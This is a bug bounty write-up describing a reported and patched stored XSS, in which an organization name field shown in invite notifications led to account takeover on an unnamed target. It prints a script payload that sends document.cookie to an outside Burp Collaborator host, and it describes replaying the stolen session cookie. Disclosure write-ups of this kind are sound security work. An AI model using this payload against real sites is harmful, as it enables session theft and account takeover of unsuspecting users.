Account takeover via stored xss
Hi everyone! This is Vikram Naidu, Bug bounty hunter from India. Hope you all are safe. This is my first writeup and it is about my recent finding on a private program where I was able to completely takeover any users, employee, admins accounts just by sending an invite email.
We will refer the website as Target.com . So the target.com has a many features like creating an organization, inviting users to the organization, assigning different roles to each user, etc. After seeing all these features, I decided to hunt on it for finding privilege escalation (PE)vulnerabilities. I signed up for an account and directly went to the feature of creating an organization. I have given organization name and observed that this input is reflected at many parts of website, so quick change of plans to find xss . I renamed the organization name to <script>alert(document.cookie)</script> and visited all the possible endpoints where the text is reflected, but unfortunately no XSS was triggered. I renamed the organization name to xyz and moved on to inviting user feature to check for PE .
As soon as I logged in to my second account in chrome, there is a notification on top saying :
If you observe the notification, yes the company name is stored and being reflected in the 2nd account where the invite was received.
Well, now you all know what to do . I instantly went back to 1st account and changed the organization name to <script>alert(document.cookie)</script> to check if xss will trigger and guess what ?
The xss is triggered and all the cookies are popped. Here in the cookies, the authentication token which is responsible for user session is also popped. While logging into my account I have checked via burp that this set-cookie is only thing which is responsible for user session.
To takeover the victims account ,I need to get hold of this cookie value. I decided to modify the payload such a way that the cookies are redirected to attacker controlled server. I have read many other writeups and understood few payloads.
Opened burp-collaborator-client and modified the payload to : <script>new Image().src=”http://burp.burpcollaborator.net/abc.php?output="+document.cookie;</script> . Used this payload and sent invite to the victim. as soon as the victim logged into his account, xss is triggered and my burp collaborator received http request with cookie details of victim.
As you can see in the request, we are receiving all the cookies. Noted down the authentication cookie and replaced with my cookie while logging in and I am directly logged in to victim account.
Note : In order to takeover any account you just need to enter their email and send invite. whenever they login to the account, the attacker will receive cookies.
Reported this vulnerability on 21st July . They patched and rewarded bounty on the same day.